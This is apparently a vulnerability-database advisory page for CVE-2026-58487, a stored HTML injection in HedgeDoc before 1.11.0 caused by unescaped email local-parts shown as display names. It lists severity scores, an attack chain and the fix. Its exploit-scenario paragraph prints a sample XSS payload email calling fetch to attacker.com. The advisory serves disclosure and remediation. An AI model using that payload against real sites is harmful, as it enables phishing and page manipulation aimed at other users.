Skip to main content

HedgeDoc CVE-2026-58487

MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-13 GitHub_M
5.1
CVSS 4.0 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.4 MEDIUM

Network vector, low privileges for registration, user interaction required to view page, scope change affects other users, low C/I due to CSP blocking script execution.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

1
Analysis Generated
Jul 13, 2026 - 22:32 vuln.today

DescriptionCVE.org

HedgeDoc is an open source, real-time, collaborative, markdown notes application. Prior to version 1.11.0, due to unsafe handling of the local-part of registered email addresses, HedgeDoc was vulnerable to stored HTML Injection through its publish and slide views. An attacker could register a specially crafted email address and inject arbitrary HTML into pages viewed by other users. HedgeDoc accepted RFC 5321 quoted-string local-parts in email addresses during registration. The local-part was then reused as the user's display name without escaping and rendered into HTML in multiple places, including publish and slide views as well as the collaborative editor. An attacker could break out of an HTML attribute and inject arbitrary markup into the page. While the deployed Content-Security-Policy prevented straightforward inline JavaScript execution, the injected HTML was still sufficient to alter page content and embed attacker-controlled resources such as cross-origin iframes. This issue was fixed in version 1.11.0.

AnalysisAI

Stored HTML injection in HedgeDoc prior to 1.11.0 allows low-privileged, registered attackers to inject arbitrary HTML into publish views, slide views, and the collaborative editor by registering an email address with an RFC 5321 quoted-string local-part, which is then rendered as the display name without output encoding. Victims who view affected pages are exposed to content manipulation and attacker-controlled cross-origin iframe embedding; direct JavaScript execution is mitigated by the deployed Content-Security-Policy, but phishing, UI redressing, and resource injection remain viable. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Register account with crafted RFC 5321 email
Delivery
HedgeDoc stores unescaped local-part as display name
Exploit
Attacker creates or edits a note/slide
Execution
Victim opens publish or slide view
Persist
Injected HTML renders in victim's browser
Impact
Attacker-controlled iframe or resource loads within trusted origin

Vulnerability AssessmentAI

Exploitation The attacker must be able to register a new account on the target HedgeDoc instance - this is the primary prerequisite. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 5.1 (AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N) reflects the key mitigating factors: low privileges (PR:L - registration required), passive user interaction (UI:P - a victim must view an affected page), and limited integrity impact bounded by the CSP. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers a HedgeDoc account using an email address such as '"<img src=x onerror=fetch(attacker.com)>"@example.com', causing HedgeDoc to store the unescaped local-part as their display name. When any other user opens a published note or slide deck where this account's display name is rendered, the injected HTML executes in the victim's browser, potentially embedding a cross-origin iframe pointed at an attacker-controlled phishing page within the trusted HedgeDoc origin. …
Remediation Upgrade to HedgeDoc version 1.11.0, which resolves this issue by properly escaping the email local-part before using it as a display name in HTML contexts. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2020-26287 HIGH POC
8.7 Dec 29

HedgeDoc is a collaborative platform for writing and sharing markdown. Rated high severity (CVSS 8.7), this vulnerabilit

CVE-2023-38487 HIGH POC
8.2 Aug 04

HedgeDoc is software for creating real-time collaborative markdown notes. Rated high severity (CVSS 8.2), this vulnerabi

CVE-2024-45308 MEDIUM POC
6.5 Sep 02

HedgeDoc is an open source, real-time, collaborative, markdown notes application. Rated medium severity (CVSS 6.5), this

CVE-2021-21259 MEDIUM POC
6.1 Jan 22

HedgeDoc is open source software which lets you create real-time collaborative markdown notes. Rated medium severity (CV

CVE-2021-29475 CRITICAL
10.0 Apr 26

HedgeDoc (formerly known as CodiMD) is an open-source collaborative markdown editor. Rated critical severity (CVSS 10.0)

CVE-2021-29474 MEDIUM POC
5.8 Apr 26

HedgeDoc (formerly known as CodiMD) is an open-source collaborative markdown editor. Rated medium severity (CVSS 5.8), t

CVE-2026-58486 HIGH
8.3 Jul 13

Denial of service in HedgeDoc before 1.11.0 lets a user who can store a note crash the instance by embedding a YAML "ali

CVE-2020-26286 HIGH
7.5 Dec 29

HedgeDoc is a collaborative platform for writing and sharing markdown. Rated high severity (CVSS 7.5), this vulnerabilit

CVE-2026-58488 MEDIUM
6.9 Jul 13

Rate-limiting bypass in HedgeDoc prior to 1.11.0 permits unauthenticated remote attackers to circumvent brute-force prot

CVE-2026-58489 MEDIUM
6.8 Jul 13

HedgeDoc's GitHub Gist export feature exposes private and protected note content to attacker-controlled GitHub accounts

CVE-2025-32391 MEDIUM
6.4 Apr 10

HedgeDoc is an open source, real-time, collaborative, markdown notes application. Rated medium severity (CVSS 6.4), this

CVE-2021-39175 MEDIUM
6.1 Aug 30

HedgeDoc is a platform to write and share markdown. Rated medium severity (CVSS 6.1), this vulnerability is remotely exp

Share

CVE-2026-58487 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy